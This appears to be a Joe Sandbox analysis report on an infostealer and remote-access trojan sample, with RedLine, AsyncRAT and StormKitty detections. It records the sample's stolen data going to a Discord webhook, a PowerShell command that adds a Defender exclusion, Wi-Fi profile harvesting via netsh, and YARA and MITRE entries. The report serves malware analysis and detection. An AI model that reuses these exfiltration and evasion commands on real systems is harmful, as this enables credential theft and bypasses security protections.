2024-11-27 11:17:49 UTC	987	IN	HTTP/1.1 200 OK Date: Wed, 27 Nov 2024 11:17:49 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Wed, 27 Nov 2024 11:17:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5dhtXp4WyW6bgd2dE4mQLeKVmY1lTEb9ktz6A3iQjlbSAPfnPwwavoG7mJznpXXzKb22ehwEdG36mOhXY3kM8jIkmmIcwI6inXSKigaoxibWDhZCawPJa4OXUaPRITXK0cm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8e91b6c2e8aa438b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1700&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=726&delivery_rate=1673352&cwnd=169&unsent_bytes=0&cid=9f9abb1c319557fa&ts=1481&x=0"
2024-11-27 11:17:49 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 32 37 30 36 32 36 39 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1732706269}

Timestamp	Bytes transferred	Direction	Data
2024-11-27 11:17:51 UTC	266	OUT	POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: discord.com Content-Length: 2223 Expect: 100-continue Connection: Keep-Alive
2024-11-27 11:17:51 UTC	2223	OUT	Data Raw: 75 73 65 72 6e 61 6d 65 3d 53 74 65 61 6c 65 72 69 75 6d 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 25 32 66 34 35 38 35 37 35 39 30 25 32 66 31 33 38 35 36 38 37 34 36 2d 31 61 35 35 37 38 66 65 2d 66 35 31 62 2d 34 31 31 34 2d 62 63 66 32 2d 65 33 37 34 35 33 35 66 38 34 38 38 2e 70 6e 67 26 63 6f 6e 74 65 6e 74 3d 25 37 62 25 30 64 25 30 61 2b 2b 25 32 32 44 65 66 61 75 6c 74 25 32 32 25 33 61 2b 25 37 62 25 30 64 25 30 61 2b 2b 2b 2b 25 32 32 44 61 74 65 25 32 32 25 33 61 2b 25 32 32 32 30 32 34 2d 31 31 2d 32 37 2b 36 25 33 61 31 37 25 33 61 33 38 2b 61 6d 25 32 32 25 32 63 25 30 64 25 30 61 2b 2b 2b 2b 25 32 32 53 79 Data Ascii: username=Stealerium&avatar_url=https%3a%2f%2fuser-images.githubusercontent.com%2f45857590%2f138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.png&content=%7b%0d%0a++%22Default%22%3a+%7b%0d%0a++++%22Date%22%3a+%222024-11-27+6%3a17%3a38+am%22%2c%0d%0a++++%22Sy
2024-11-27 11:17:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-27 11:17:52 UTC	1304	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Nov 2024 11:17:51 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1732706273 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtlhEshvqq%2Bo1LRIFdNgydwzEUchkGwdYNFfCxt3qkuDQnU3rPgR%2BEienNwgcywITzR7%2FqSs2F3zMEv5EfuKSZSa1DepEpbMH7u1m%2FedsOMMmhalMeDXx%2Bjd7s2w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=fc596719fa9c7befcecf0d62ea94a09bbc89430e-1732706271; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=G2Ui7ASZm34NrHHCPbuNfzPSNDIasFxnOE._ZZFLxA4-1732706271889-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8e91b6d5486b41db-EWR {"message": "Unknown Webhook", "code": 10015}

Target ID:	0
Start time:	06:16:55
Start date:	27/11/2024
Path:	C:\Users\user\Desktop\VzhY4BcvBH.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\VzhY4BcvBH.exe"
Imagebase:	0xe00000
File size:	95'744 bytes
MD5 hash:	1D3961A5C49F14F107E4CEE038D45FD0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	06:16:59
Start date:	27/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	06:17:07
Start date:	27/11/2024
Path:	C:\Users\user\AppData\Roaming\system32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\system32.exe"
Imagebase:	0x870000
File size:	97'792 bytes
MD5 hash:	4F872C2AC85FB6A67DE72BD0A6D2724F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\system32.exe, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\system32.exe, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Roaming\system32.exe, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Roaming\system32.exe, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	10
Start time:	06:17:19
Start date:	27/11/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x160000
File size:	75'776 bytes
MD5 hash:	50D960B16FFE409FD2D7F3EE2D4FD603
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: 0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VzhY4BcvBH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VenomRAT

Threatname: AsyncRAT

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\DotNetZip-3mytymt2.tmp

C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH.zip (copy)

C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Directories\Desktop.txt

C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Directories\Documents.txt

C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Directories\Downloads.txt

C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Directories\OneDrive.txt

C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Directories\Pictures.txt

Windows Analysis Report
VzhY4BcvBH.exe

Target ID:	12
Start time:	06:17:41
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x7ff76fc60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	06:17:42
Start date:	27/11/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff6abc00000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	1

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	62.5%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre